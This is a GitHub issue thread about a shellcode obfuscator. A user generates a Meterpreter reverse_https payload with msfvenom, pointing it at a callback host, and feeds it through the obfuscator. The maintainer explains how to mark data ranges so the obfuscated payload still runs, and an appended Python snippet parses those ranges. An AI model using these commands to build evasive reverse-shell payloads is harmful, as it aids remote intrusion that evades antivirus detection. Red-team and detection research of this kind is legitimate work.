
Can't generate working shellcode

Open vysecurity opened this issue 9 years ago • 9 comments

So all of the generated shell code seems to be broken...

I can't generate working shell code that does not crash.

vysecurity avatar Jul 08 '16 14:07 vysecurity

Can you send me one of the shellcodes that you are trying to obfuscate? They may have some hardcoded offsets that make obfuscation impossible.

You can send in binary form and I will disassemble myself.

kgretzky avatar Jul 08 '16 14:07 kgretzky

Email? :)

vysecurity avatar Jul 08 '16 14:07 vysecurity

Actually, I just did:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.58.128 LPORT=443 -f raw -o /root/sc.bin

python x86_obf.py -i /root/sc.bin -o /root/sc2.bin -r0-184

vysecurity avatar Jul 08 '16 14:07 vysecurity

sc.bin injects fine and calls back. sc2.bin crashes.

vysecurity avatar Jul 08 '16 14:07 vysecurity

Ah sure :)

kuba -at- breakdev.org

kgretzky avatar Jul 08 '16 14:07 kgretzky

Can you send me the sc.bin file? I don't have the metasploit environment around me currently. I will take a look at it and let you know what's up.

kgretzky avatar Jul 08 '16 14:07 kgretzky

Sent Email.

vysecurity avatar Jul 16 '16 21:07 vysecurity

Thanks, got it! I took a look and it seems the reverse_https has a lot of static data (of variable length at every generation, unfortunately), so before obfuscating the generated shellcode you need to specify the proper data ranges, so that the obfuscator knows which parts of the shellcode are not code up for obfuscation.

Take a look: http://i.imgur.com/lN7W7t3.png I highlighted the largest data block in the middle, and there is also a data block in the end with the IP address string. You need to view each generated shellcode and manually figure out the data ranges.

In your situation, for this specific sc.bin file, the argument for specifying code ranges would look like this: -r0-184,329-465,481-490

For now I'd advise using the reverse_tcp payload as it doesn't have any static data blocks. I will be working on a Metasploit generator tool using the Obfusion library that will simplify the process of generating obfuscated shellcodes.

kgretzky avatar Jul 20 '16 08:07 kgretzky
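As an added example (not code from the obfuscator or from this thread), the -r range syntax above parsed and validated in Python, then used to list the gaps the obfuscator leaves untouched and any printable strings inside them, which are exactly the bytes that stay constant across obfuscated copies and remain signaturable. The half-open [start, end) reading of each range and the sample bytes are assumptions, not taken from the tool.

```python
import re

# Range spec as typed on the obfuscator command line in this thread, e.g.
# "0-184,329-465,481-490". Assumption (not stated in the thread): each "a-b"
# is treated here as a half-open byte range [a, b).
RANGE_RE = re.compile(r"^(\d+)-(\d+)$")

def parse_code_ranges(spec, total_len):
    """Parse a -r spec into sorted (start, end) pairs, rejecting malformed,
    out-of-bounds or overlapping entries."""
    ranges = []
    for item in spec.split(","):
        m = RANGE_RE.match(item.strip())
        if not m:
            raise ValueError(f"malformed range {item!r}")
        start, end = int(m.group(1)), int(m.group(2))
        if not (0 <= start < end <= total_len):
            raise ValueError(f"range {item!r} outside 0..{total_len}")
        ranges.append((start, end))
    ranges.sort()
    for (_, prev_end), (start, _) in zip(ranges, ranges[1:]):
        if start < prev_end:
            raise ValueError("overlapping code ranges")
    return ranges

def data_gaps(code_ranges, total_len):
    """Complement of the code ranges: bytes the obfuscator must leave alone."""
    gaps, cursor = [], 0
    for start, end in code_ranges:
        if start > cursor:
            gaps.append((cursor, start))
        cursor = end
    if cursor < total_len:
        gaps.append((cursor, total_len))
    return gaps

def printable_runs(blob, gaps, min_len=4):
    """Printable-ASCII runs inside the untouched gaps (such as the callback
    address string): they survive obfuscation unchanged, so they stay detectable."""
    found = []
    for start, end in gaps:
        for m in re.finditer(rb"[ -~]{%d,}" % min_len, blob[start:end]):
            found.append((start + m.start(), m.group().decode()))
    return found

# Constructed sample, not real shellcode: 16 "code" bytes, a 20-byte data
# block holding a URI fragment, 8 more "code" bytes, then a trailing string.
SAMPLE = (bytes(range(16)) + b"\x00" * 6 + b"https://x/" + b"\x00" * 4
          + bytes(range(8)) + b"192.168.58.128\x00")
SAMPLE_SPEC = "0-16,36-44"  # code ranges for SAMPLE, leaving two data gaps
```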

Thanks. I think I get it. I'll go into some more work with this :)

vysecurity avatar Aug 26 '16 14:08 vysecurity